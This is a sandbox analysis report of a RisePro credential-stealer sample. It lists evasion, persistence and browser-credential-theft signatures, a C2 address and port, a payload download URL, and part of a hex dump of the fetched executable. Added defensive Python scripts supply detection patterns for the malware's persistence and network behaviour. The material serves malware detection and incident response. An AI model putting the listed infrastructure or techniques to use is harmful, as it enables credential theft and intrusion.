Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1443534
MD5: 3d09739846543f4962f2b432da671c29
SHA1: 2247e38b1f5257df93db091328488c652f6bea0a
SHA256: 70aaa6e67944e919f8c7bbdf71b6b09deed41f51166bc1dc15fc6f66efc1b014
Tags: exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
PE file contains section with special chars
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
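The drop locations and persistence signatures listed above (PE files written under C:\ProgramData, %LOCALAPPDATA% and %TEMP%, a Startup folder entry, a CurrentVersion Run key change, and schtasks.exe launched from a user-writable path) are the host-side indicators a responder would sweep for. The checker below is an added example written for this page; it is not part of the Joe Sandbox report and is not the logic of the Sigma rules it names, only a simplified form of their conditions applied to Sysmon-style events. The three dropped-copy paths and the oobeldr.exe path are taken from the report's AV-detection entries; the Startup entry name, task name and Run value name are placeholders, because the report does not print them.

```python
import re

# Directory/file naming of the dropped copies listed in this report:
# <Name>_<32 hex>\<Name>.exe under C:\ProgramData, %LOCALAPPDATA% or %TEMP%.
# All three report paths carry the same tag, 45c48cce2e2d7fbdea1afc51c7c6ad26.
DROPPED_COPY = re.compile(
    r"(?i)^(?:C:\\ProgramData|C:\\Users\\[^\\]+\\AppData\\Local(?:\\Temp)?)"
    r"\\(?P<stem>[A-Za-z0-9]+?)_(?P<tag>[0-9a-f]{32})\\(?P=stem)\.exe$"
)
# %APPDATA%\Microsoft\Protect holds DPAPI master keys; an .exe there is anomalous.
PROTECT_DIR_EXE = re.compile(r"(?i)\\AppData\\Roaming\\Microsoft\\Protect\\[^\\]+\.exe$")
STARTUP_DIR = re.compile(r"(?i)\\Start Menu\\Programs\\Startup\\[^\\]+$")
RUN_KEY = re.compile(r"(?i)\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")
# Locations a standard user can write to. A schtasks /tr target or a schtasks
# parent process living here is the core condition of the two Sigma schtasks
# rules named above (simplified here; this is not the rules' exact logic).
USER_WRITABLE = re.compile(
    r"(?i)%(?:appdata|localappdata|temp|tmp|programdata)%|\\AppData\\"
    r"|^C:\\ProgramData\\|\\Users\\Public\\"
)
TR_ARG = re.compile(r'(?i)/tr\s+"?([^"]+?)"?(?:\s+/|$)')  # target of schtasks /create


def triage(events):
    """Return (label, detail) pairs for a list of Sysmon-style event dicts."""
    findings = []
    for ev in events:
        kind = ev["type"]
        if kind == "file_create":
            path = ev["path"]
            m = DROPPED_COPY.match(path)
            if m:
                findings.append(("dropped_copy", f"{m['stem']} tag={m['tag']}"))
            if PROTECT_DIR_EXE.search(path):
                findings.append(("exe_in_dpapi_protect_dir", path))
            if STARTUP_DIR.search(path):
                findings.append(("startup_folder_write", path))
        elif kind == "process" and ev["image"].lower().endswith("schtasks.exe"):
            cmd = ev["cmdline"]
            if "/create" in cmd.lower():
                tr = TR_ARG.search(cmd)
                if tr and USER_WRITABLE.search(tr.group(1)):
                    findings.append(("schtasks_user_writable_target", tr.group(1)))
                if USER_WRITABLE.search(ev.get("parent_image", "")):
                    findings.append(("schtasks_suspicious_parent", ev["parent_image"]))
        elif kind == "reg_set" and RUN_KEY.search(ev["key"]):
            findings.append(("run_key_modification", f"{ev['key']} = {ev['value']}"))
    return findings


def shared_tag(findings):
    """The tag common to every dropped copy, or None if they differ."""
    tags = {d.rsplit("tag=", 1)[1] for label, d in findings if label == "dropped_copy"}
    return tags.pop() if len(tags) == 1 else None


TAG = "45c48cce2e2d7fbdea1afc51c7c6ad26"
SAMPLE_EVENTS = [
    # Paths taken from the report's AV-detection entries.
    {"type": "file_create", "path": rf"C:\ProgramData\MSIUpdaterV2_{TAG}\MSIUpdaterV2.exe"},
    {"type": "file_create", "path": rf"C:\Users\user\AppData\Local\Temp\EdgeMS2_{TAG}\EdgeMS2.exe"},
    {"type": "file_create", "path": r"C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"},
    # Constructed: the report does not print the Startup entry, task or value names.
    {"type": "file_create",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\example.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": rf"C:\Users\user\AppData\Local\Temp\EdgeMS2_{TAG}\EdgeMS2.exe",
     "cmdline": rf'schtasks /create /tn "ExampleTask" /tr "C:\Users\user\AppData\Local\Temp\EdgeMS2_{TAG}\EdgeMS2.exe" /sc minute /mo 1'},
    {"type": "reg_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ExampleValue",
     "value": rf"C:\ProgramData\MSIUpdaterV2_{TAG}\MSIUpdaterV2.exe"},
    # Benign control: an installer under Program Files registering its own updater.
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'schtasks /create /tn "VendorUpdate" /tr "C:\Program Files\Vendor\updater.exe" /sc daily'},
]

if __name__ == "__main__":
    for label, detail in triage(SAMPLE_EVENTS):
        print(f"{label:<32} {detail}")
    print("shared tag:", shared_tag(triage(SAMPLE_EVENTS)))
```

Running it yields seven findings for the sample and none for the benign control. The DROPPED_COPY pattern is deliberately tied to the structure of the paths rather than to the names, so a fresh build that uses different product names but the same `<Name>_<tag>\<Name>.exe` layout still matches, and shared_tag shows that all copies on one host carry the same 32-character value (MD5-length, though the report does not say what it hashes).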

Classification

AV Detection

Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\span1UB98D2D2zeo\llmcrdwzLnNKYB4T0Vnw.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_06D2B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D62EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06D62EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D7CCFD FindFirstFileExW, 0_2_06D7CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D2BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_06D2BAC0

Networking

Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.96.65:50500 -> 192.168.2.5:49704
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.5:49704 -> 5.42.96.65:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49707 -> 5.42.96.170:80
Source: global traffic TCP traffic: 192.168.2.5:49704 -> 5.42.96.65:50500
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 17 May 2024 21:45:14 GMTServer: Apache/2.4.59 (Debian)Last-Modified: Thu, 16 May 2024 16:35:58 GMTETag: "45a2b8-61894d4759081"Accept-Ranges: bytesContent-Length: 4563640Content-Type: application/x-msdos-programData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 
26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d c2 aa
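The response body in the record above is the start of l2.exe (Content-Type application/x-msdos-program, Content-Length 4563640). Its headers alone account for two of the signatures in the summary: the section table holds .MPRESS1, .MPRESS2 and .rsrc (the first two are the names the MPRESS packer writes), the entry point 0x7780c8 falls inside .MPRESS2 rather than in a .text section, and the Security data directory points at 0x18b8 bytes at file offset 0x458a00, which runs exactly to the end of the 4563640-byte body, so the packed file carries an Authenticode certificate table (consistent with the Sectigo timestamping-CA URLs the report finds in the dropped files). The bytes 76 32 2e 31 39 that follow the section table in the dump read "v2.19". The parser below is an added example, not code from the report; its input is the first 432 bytes transcribed from that dump, which is all that is needed to reach the section table.

```python
import struct

# First 432 bytes of the response body printed in the record above (DOS header,
# COFF header, PE32 optional header with its 16 data directories, and the three
# section headers), transcribed from that hex dump; the rest of the 4,563,640-byte
# body is not reproduced here.
L2_EXE_HEAD = (
    bytes.fromhex(
        "4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 "
        "b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 "
        "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 "
        "6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 "
        "50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 "
        "00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 "
        "00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 "
        "00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 "
        "06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 "
        "00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 "
        "00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 "
        "00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 "
        "00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 "
        "00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 ")  # directories 0..4
    + bytes(56)                                  # directories 5..11: empty
    + bytes.fromhex("50 80 77 00 10 00 00 00")   # directory 12: IAT
    + bytes(24)                                  # directories 13..15: empty
    + bytes.fromhex(                             # section table, 3 x 40 bytes
        "2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 "
        "00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 "
        "2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 "
        "00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 "
        "2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 "
        "00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 ")
)
CONTENT_LENGTH = 4563640  # Content-Length header of the same response

DIRS = ("EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
        "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
        "DELAY_IMPORT", "CLR", "RESERVED")
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".crt"}
SCN_EXECUTE, SCN_WRITE = 0x20000000, 0x80000000


def parse_pe32(data):
    """Parse the headers of a PE32 image; raises ValueError on anything else."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]              # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                               # optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + 96 + 8 * i)
        if size:
            dirs[DIRS[i]] = (rva, size)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(dict(name=name, va=va, vsize=vsize, raw_ptr=raw_ptr,
                             raw_size=raw_size, flags=flags))
    return dict(machine=machine, timestamp=stamp, characteristics=chars,
                entry=entry, image_base=image_base, dirs=dirs, sections=sections)


def section_of(pe, rva):
    """Name of the section whose virtual range contains rva, or None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def triage(pe, file_size=None):
    """Header-only findings matching the report's static signatures."""
    out = []
    odd = [s["name"] for s in pe["sections"] if s["name"] not in STANDARD_SECTIONS]
    if odd:
        out.append(f"non-standard section names: {odd}")
    ep = section_of(pe, pe["entry"])
    if ep != ".text":
        out.append(f"entry point {pe['entry']:#x} lies in {ep}")
    wx = [s["name"] for s in pe["sections"] if s["flags"] & SCN_EXECUTE and s["flags"] & SCN_WRITE]
    if wx:
        out.append(f"writable+executable sections: {wx}")
    if "SECURITY" in pe["dirs"] and file_size is not None:
        off, size = pe["dirs"]["SECURITY"]  # this directory holds a file offset, not an RVA
        if off + size == file_size:
            out.append(f"Authenticode blob {size:#x} bytes at file offset {off:#x} runs exactly to end of file")
    return out
```

`triage(parse_pe32(L2_EXE_HEAD), CONTENT_LENGTH)` returns four findings: the two MPRESS section names, the entry point inside .MPRESS2, both MPRESS sections mapped writable and executable (characteristics 0xe00000e0), and the certificate table ending at exactly byte 4563640. The last check is the one worth keeping in a triage pipeline: a signature blob that ends precisely at EOF on an otherwise packed, oddly-sectioned file is the cheapest header-level hint that the sample was signed or timestamped to pass reputation checks, and it needs only the first few hundred bytes plus the Content-Length to evaluate.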
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 5.42.96.65
Source: Joe Sandbox View IP Address: 172.67.75.166
Source: Joe Sandbox View ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/12.205.151.60 HTTP/1.1 | Connection: Keep-Alive | Referer: https://ipinfo.io/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=12.205.151.60 HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: db-ip.com
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 | Host: 5.42.96.170 | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 | Host: 5.42.96.170 | Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.96.65 (50 identical entries)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06D41980 SetThreadExecutionState,SetThreadExecutionState,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,recv,WSAGetLastError,__aulldiv,__aulldiv,send,recv,recv,recv,recv,Sleep,Sleep, 0_2_06D41980
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: global traffic DNS traffic detected: DNS query: kuljyftgjk.online
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
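Taken together, the traffic entries above show three behaviours that are detectable without the RisePro-specific Snort signatures: a public-IP lookup against the demo endpoints of ipinfo.io and db-ip.com (the address in both URLs is the one those services saw the analysis host arriving from, matching the "May check the online IP address of the machine" signature), a HEAD-then-GET of a short-named .exe from a bare IP with a browser User-Agent (the ET 2019714 alert above), and a long-lived TCP session to 5.42.96.65:50500 for which no DNS answer exists, while the same client presents two different User-Agent strings (Chrome/123 to the lookup services, Edg/117 to the download host). The script below is an added example, not part of the report. Its session records are constructed from the entries above; the pairing of ipinfo.io with 34.117.186.192 and db-ip.com with 172.67.75.166 is assumed from the two HTTPS flows, since the report prints the queries without their answers.

```python
import ipaddress
import re

# Constructed session records in the shape of the report's Networking entries.
UA_CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36")
UA_EDGE = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
           "(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36")
DNS = [  # (query name, answer IPs); the two answers are assumed, see lead-in
    ("ipinfo.io", ["34.117.186.192"]),
    ("db-ip.com", ["172.67.75.166"]),
    ("kuljyftgjk.online", []),        # the report shows the query, no answer
]
CONNS = [  # (destination IP, destination port)
    ("5.42.96.65", 50500),
    ("34.117.186.192", 443),
    ("172.67.75.166", 443),
    ("5.42.96.170", 80),
]
HTTP = [  # (method, Host header, path, User-Agent, Referer)
    ("GET", "ipinfo.io", "/widget/demo/12.205.151.60", UA_CHROME, "https://ipinfo.io/"),
    ("GET", "db-ip.com", "/demo/home.php?s=12.205.151.60", UA_CHROME, None),
    ("HEAD", "5.42.96.170", "/server/k/l2.exe", UA_EDGE, None),
    ("GET", "5.42.96.170", "/server/k/l2.exe", UA_EDGE, None),
]

# Public "what is my IP" services commonly contacted by stealers to geolocate the victim.
IP_LOOKUP_HOSTS = {"ipinfo.io", "db-ip.com", "api.ipify.org", "icanhazip.com", "ifconfig.me"}
TERSE_EXE = re.compile(r"(?i)/[a-z0-9]{1,4}\.exe$")   # simplification of ET 2019714's idea
BROWSER_UA = re.compile(r"^Mozilla/5\.0 \(Windows NT")
COMMON_PORTS = {25, 53, 80, 110, 143, 443, 465, 587, 993, 995, 8080, 8443}


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def tcp_without_dns(dns, conns):
    """Public destinations contacted although no DNS answer ever named them."""
    resolved = {ip for _, answers in dns for ip in answers}
    return [(ip, port) for ip, port in conns
            if ip not in resolved and ipaddress.ip_address(ip).is_global]


def nonstandard_ports(conns, common=COMMON_PORTS):
    return [(ip, port) for ip, port in conns if port not in common]


def http_findings(requests):
    out = []
    for method, host, path, ua, _referer in requests:
        if host.lower() in IP_LOOKUP_HOSTS:
            out.append(("external_ip_lookup", f"{host}{path}"))
        if is_bare_ip(host) and TERSE_EXE.search(path) and BROWSER_UA.match(ua):
            out.append(("exe_from_bare_ip_with_browser_ua", f"{method} http://{host}{path}"))
    agents = {ua for _, _, _, ua, _ in requests}
    if len(agents) > 1:  # one process claiming to be two browsers
        out.append(("mixed_user_agents", sorted(agents)))
    return out


if __name__ == "__main__":
    print("TCP without DNS:", tcp_without_dns(DNS, CONNS))
    print("non-standard ports:", nonstandard_ports(CONNS))
    for label, detail in http_findings(HTTP):
        print(label, detail)
```

The DNS-less check flags both 5.42.96.65:50500 and the download host 5.42.96.170, which is correct: a GET with a bare-IP Host header has no DNS step either, and the report itself only separates the two because the second is visible as HTTP. The mixed-User-Agent check is the least obvious of the three and the hardest for the operator to avoid, since the lookup and download code paths carry their own hard-coded strings.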
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.42.96.170/server/k/l2.exe
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.42.96.170/server/k/l2.exe5
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.42.96.170/server/k/l2.exeDTl
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
